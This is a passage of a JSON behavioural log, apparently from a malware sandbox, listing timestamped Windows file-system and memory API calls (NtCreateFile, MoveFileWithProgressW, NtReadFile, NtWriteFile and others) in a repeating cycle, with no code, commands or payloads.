"filesystem", "timestamp": "2016-02-16 17:41:45,337", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,337", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,347", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,347", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,347", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,347", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,347", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,347", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,347", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,347", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,347", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,347", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,347", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,347", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,357", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,357", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,357", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,357", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,357", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,357", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,357", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:45,357", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,357", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,367", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,367", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,367", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,367", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,367", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,367", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,367", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,367", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,367", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,367", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,367", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,377", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,377", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,377", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,377", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,377", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,377", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,377", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,377", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:45,377", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,377", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,387", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,387", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,387", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,387", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,387", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,387", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,387", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,387", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,387", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,387", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,397", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,397", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,397", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,397", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,397", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,397", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,397", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,397", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,397", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,407", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,407", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,407", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,407", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,407", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,407", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,407", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,407", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,407", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,407", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,407", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,417", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,417", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,417", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,417", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,417", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,417", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,417", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,417", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,417", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,417", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,427", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,427", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,427", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,427", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,427", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,427", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,427", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,427", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,427", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,427", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,427", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,437", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,437", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,437", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,458", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,458", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,458", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,458", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,458", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,458", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,458", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,458", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:45,458", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,458", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,468", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,468", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,468", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,468", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,468", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,468", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,468", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,468", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,468", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,468", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,468", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,478", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,478", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,478", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,478", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,478", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,478", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,478", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,478", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:45,488", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,488", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,488", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,488", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,488", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,488", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,488", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,488", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,488", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,498", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,498", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,498", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,498", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,498", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,498", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,498", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,498", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,498", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,498", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,498", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,508", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:45,508", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,508", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,508", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,508", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,508", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,508", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,508", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,508", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,518", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,518", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,518", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,518", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,518", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,518", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,518", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,518", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,518", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,518", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,528", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,528", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,528", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:45,528", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,528", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,528", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,528", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,528", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,538", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,538", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,538", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,538", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,538", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,538", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,538", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,538", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,538", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,538", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,548", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,548", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,548", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,548", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,548", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,548", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,548", "api": 
"NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,548", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,548", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,548", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,558", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,558", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,558", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,558", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,558", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,558", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,558", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,558", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,558", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,568", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,568", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,568", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,568", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,568", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,568", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,568", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,568", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,568", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:45,568", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,568", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,578", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,578", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,578", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,578", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,578", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,578", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,578", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,578", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,588", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,588", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,588", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,588", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,588", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,588", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,588", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,608", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,608", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,608", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,608", "api": "NtWriteFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:45,618", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,618", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,618", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,618", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,618", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,618", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,618", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,628", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,628", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,628", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,628", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,628", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,628", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,628", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,628", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,628", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,628", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,628", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,638", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,638", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,638", "api": "MoveFileWithProgressW"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:45,638", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,638", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,638", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,638", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,638", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,638", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,638", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,648", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,648", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,648", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,648", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,648", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,648", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,648", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,648", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,648", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,658", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,658", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,658", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,658", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,658", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 
17:41:45,658", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,658", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,658", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,658", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,658", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,658", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,668", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,668", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,668", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,668", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,668", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,668", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,668", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,668", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,668", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,668", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,668", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,678", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,678", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,678", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,678", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,678", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,678", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,678", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,678", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,678", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,678", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,678", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,688", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,688", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,688", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,688", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,688", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,688", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,688", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,688", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,688", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,688", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,698", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,698", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,698", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,698", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,698", "api": 